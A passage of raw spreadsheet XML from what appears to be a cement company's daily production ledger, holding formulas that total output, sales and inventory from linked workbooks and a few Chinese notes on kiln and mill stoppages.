      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'25'!K60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'[14]26'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]26'!$E$6</f>
        <v>3176</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'25'!H61</f>
        <v>98304</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1214177</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]26'!$E$21</f>
        <v>3209.51</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'25'!K61</f>
        <v>102219.47</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1203379.55</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]26'!$H$6</f>
        <v>33853.6999999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>65.103269230769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'[14]26'!$M$11+'[14]26'!$M$12+'[14]26'!$M$13+'[14]26'!$M$14+'[14]26'!$M$15+'[14]26'!$M$16+'[14]26'!$M$17+'[14]26'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]26'!$N$11+'[14]26'!$N$12+'[14]26'!$N$13+'[14]26'!$N$14+'[14]26'!$N$15+'[14]26'!$N$16+'[14]26'!$N$17+'[14]26'!$N$18</f>
        <v>3350</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'25'!H62</f>
        <v>70417</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>906410.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]26'!$Q$11+'[14]26'!$Q$12+'[14]26'!$Q$13+'[14]26'!$Q$14+'[14]26'!$Q$15+'[14]26'!$Q$16+'[14]26'!$Q$17+'[14]26'!$Q$18</f>
        <v>2287</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'25'!K62</f>
        <v>70779</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>905251.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]26'!$T$11+'[14]26'!$T$12+'[14]26'!$T$13+'[14]26'!$T$14+'[14]26'!$T$15+'[14]26'!$T$16+'[14]26'!$T$17+'[14]26'!$T$18</f>
        <v>18092.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>72.3705359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]26'!$Q$71</f>
        <v>窑:续停。水泥磨:10：00-22：00避峰停机。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]26'!$M$19+'[14]26'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]26'!$N$19+'[14]26'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'25'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]26'!$Q$19+'[14]26'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'25'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]26'!$T$19+'[14]26'!$T$20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G64+'25'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'25'!K64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G65+'25'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'25'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]26'!$Q$74</f>
        <v>1#窑:续停；2#窑:正常；1#磨:正常。2#磨:正常。3#磨:0:00-16:25库满停机。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G66+'25'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'25'!K66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G67+'25'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'25'!K67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'[15]26'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]26'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'25'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]26'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'25'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]26'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]26'!$Q$77</f>
        <v>1#磨运行正常。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]26'!$D$43+'[15]26'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]26'!$E$43+'[15]26'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'25'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]26'!$H$43+'[15]26'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'25'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]26'!$K$43+'[15]26'!$K$44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'[15]26'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]26'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'25'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]26'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'25'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]26'!$K$45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G71+'25'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'25'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]26'!$Q$80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G72+'25'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'25'!K72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G73+'25'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'25'!K73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G74+'25'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'25'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]26'!$Q$83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G75+'25'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'25'!K75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G76+'25'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'25'!K76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G77+'25'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'25'!K77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G78+'25'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'25'!K78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'[16]26'!$E$7</f>
        <v>670.1</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'25'!H79</f>
        <v>13968.88</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>161097.35</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]26'!$I$7</f>
        <v>469.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'25'!K79</f>
        <v>12811.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>154702.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]26'!$L$7</f>
        <v>6042.16</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>12.08432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'[16]26'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'25'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]26'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'25'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]26'!$Y$15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G81+'25'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'25'!K81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G82+'25'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'25'!K82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G83+'25'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'25'!K83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G84+'25'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'25'!K84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G85+'25'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'25'!K85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pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="F23"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27/31</f>
        <v>0.870967741935484</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46018</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23386.22</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'26'!H5</f>
        <v>567606.91</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6722472.94</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23032.91</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'26'!K5</f>
        <v>622846.107</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6772917.238</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>212228.627</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>56.7456221925133</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]27'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]27'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]27'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]27'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]27'!$U$101</f>
        <v>35.6430555555556</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]27'!$V$101</f>
        <v>62.4917590027701</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]27'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]27'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]27'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]27'!$D$23+'[11]27'!$D$17+'[12]27'!$D$17+'[13]27'!$D$25+'[14]27'!$D$8+'[14]27'!$D$15+'[15]27'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]27'!$E$23+'[11]27'!$E$17+'[12]27'!$E$17+'[13]27'!$E$25+'[14]27'!$E$8+'[14]27'!$E$15+'[15]27'!$E$7</f>
        <v>1060</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'26'!H6</f>
        <v>7650</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>283999.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]27'!$I$23+'[11]27'!$I$17+'[12]27'!$I$17+'[13]27'!$I$25+'[14]27'!$E$23+'[14]27'!$E$30+'[15]27'!$H$7</f>
        <v>807.73</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'26'!K6</f>
        <v>20243.32</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>282441.02</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]27'!$L$23+'[11]27'!$L$17+'[12]27'!$L$17+'[13]27'!$L$25+'[14]27'!$H$23+'[14]27'!$H$30+'[15]27'!$K$7</f>
        <v>19519.52</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]27'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]27'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]27'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]27'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]27'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]27'!$V$102</f>
        <v>32.8393236380425</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]27'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]27'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]27'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]27'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]27'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'26'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]27'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'26'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]27'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]27'!$W$107</f>
        <v>122.062552831784</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]27'!$X$107</f>
        <v>126.601781218293</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]27'!$Y$107</f>
        <v>131.415861662924</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]27'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]27'!$U$107</f>
        <v>41.0663580246914</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]27'!$V$107</f>
        <v>31.7583102493074</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]27'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]27'!$R$107</f>
        <v>266.11</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]27'!$S$107</f>
        <v>2751.53999999999</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]27'!$D$27+'[11]27'!$D$18+'[13]27'!$D$26+'[14]27'!$D$10+'[14]27'!$D$17+'[15]27'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]27'!$E$27+'[11]27'!$E$18+'[13]27'!$E$26+'[14]27'!$E$10+'[14]27'!$E$17+'[15]27'!$E$9</f>
        <v>2477</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'26'!H8</f>
        <v>57642</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>583178.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]27'!$I$27+'[11]27'!$I$18+'[13]27'!$I$26+'[14]27'!$E$25+'[14]27'!$E$32+'[15]27'!$H$9</f>
        <v>2843.6</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'26'!K8</f>
        <v>68673.76</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>576418.47</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]27'!$L$27+'[11]27'!$L$18+'[13]27'!$L$26+'[14]27'!$H$25+'[14]27'!$H$32+'[15]27'!$K$9</f>
        <v>30848.14</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]27'!$W$108</f>
        <v>117.486338797814</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]27'!$X$108</f>
        <v>133.023040159783</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]27'!$Y$108</f>
        <v>128.057951825224</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]27'!$T$108</f>
        <v>7.625</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]27'!$U$108</f>
        <v>43.2685185185185</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]27'!$V$108</f>
        <v>28.5922206832871</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]27'!$Q$108</f>
        <v>1.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]27'!$R$108</f>
        <v>280.38</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]27'!$S$108</f>
        <v>2477.23</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]27'!$D$24+'[11]27'!$D$19+'[12]27'!$D$20+'[13]27'!$D$27+'[14]27'!$D$11+'[14]27'!$D$18+'[15]27'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]27'!$E$24+'[11]27'!$E$19+'[12]27'!$E$20+'[13]27'!$E$27+'[14]27'!$E$11+'[14]27'!$E$18+'[15]27'!$E$10</f>
        <v>18617</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'26'!H9</f>
        <v>406902</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4542290.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]27'!$I$24+'[11]27'!$I$19+'[12]27'!$I$20+'[13]27'!$I$27+'[14]27'!$E$26+'[14]27'!$E$33+'[15]27'!$H$10</f>
        <v>15065.41</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'26'!K9</f>
        <v>420960.037</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4518438.848</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]27'!$L$24+'[11]27'!$L$19+'[12]27'!$L$20+'[13]27'!$L$27+'[14]27'!$H$26+'[14]27'!$H$33+'[15]27'!$K$10</f>
        <v>96807.675</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]27'!$W$109</f>
        <v>234.953464322647</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]27'!$X$109</f>
        <v>265.848792291039</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]27'!$Y$109</f>
        <v>270.888372768182</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]27'!$T$109</f>
        <v>40.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]27'!$U$109</f>
        <v>36.3533950617284</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]27'!$V$109</f>
        <v>34.9856879039704</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]27'!$Q$109</f>
        <v>9.67</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]27'!$R$109</f>
        <v>235.57</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]27'!$S$109</f>
        <v>3031.15999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]27'!$D$25+'[11]27'!$D$20+'[12]27'!$D$21+'[13]27'!$D$28+'[14]27'!$D$12+'[14]27'!$D$19+'[15]27'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]27'!$E$25+'[11]27'!$E$20+'[12]27'!$E$21+'[13]27'!$E$28+'[14]27'!$E$12+'[14]27'!$E$19+'[15]27'!$E$11</f>
        <v>300</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'26'!H10</f>
        <v>62276</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>979803.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]27'!$I$25+'[11]27'!$I$20+'[12]27'!$I$21+'[13]27'!$I$28+'[14]27'!$E$27+'[14]27'!$E$34+'[15]27'!$H$11</f>
        <v>3155.4</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'26'!K10</f>
        <v>76876.1</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>974104.82</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]27'!$L$25+'[11]27'!$L$20+'[12]27'!$L$21+'[13]27'!$L$28+'[14]27'!$H$27+'[14]27'!$H$34+'[15]27'!$K$11</f>
        <v>46606.842</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]27'!$W$110</f>
        <v>252.125</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]27'!$X$110</f>
        <v>249.875466998755</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]27'!$Y$110</f>
        <v>267.3296815931</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]27'!$T$110</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]27'!$U$110</f>
        <v>37.1759259259259</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]27'!$V$110</f>
        <v>34.6832871652816</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]27'!$Q$110</f>
        <v>8</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]27'!$R$110</f>
        <v>240.9</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]27'!$S$110</f>
        <v>3004.96</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]27'!$D$26+'[11]27'!$D$21+'[12]27'!$D$19+'[13]27'!$D$29+'[14]27'!$D$13+'[14]27'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]27'!$E$26+'[11]27'!$E$21+'[12]27'!$E$19+'[13]27'!$E$29+'[14]27'!$E$13+'[14]27'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'26'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]27'!$I$26+'[11]27'!$I$21+'[12]27'!$I$19+'[13]27'!$I$29+'[14]27'!$E$28+'[14]27'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'26'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]27'!$L$26+'[11]27'!$L$21+'[12]27'!$L$19+'[13]27'!$L$29+'[14]27'!$H$28+'[14]27'!$H$35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5859.74000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'26'!H12</f>
        <v>202444.120000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5144835.37</v>
      </c>
      <c r="J12" s="194">
